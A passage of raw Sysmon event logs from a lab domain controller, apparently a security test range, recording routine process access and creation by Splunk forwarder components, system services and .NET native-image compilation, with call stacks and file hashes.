Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.434{08A6967A-467A-6000-5B04-000000009A01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.652{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467B-6000-6004-000000009A01}1316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.636{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-467B-6000-6004-000000009A01}1316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.636{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467B-6000-6004-000000009A01}1316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467B-6000-5F04-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.418{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-467B-6000-5F04-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.418{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467B-6000-5F04-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.402{08A6967A-467B-6000-5E04-000000009A01}50724980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000008528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:19.324{08A6967A-467A-6000-5D04-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f30-0\System.Data.Services.Client.dll2021-01-14 13:26:19.324 10341000x80000000000000008527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-467B-6000-5E04-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-467B-6000-5E04-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.246{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-467B-6000-5E04-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:19.106{08A6967A-467B-6000-5E04-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-467C-6000-6304-000000009A01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 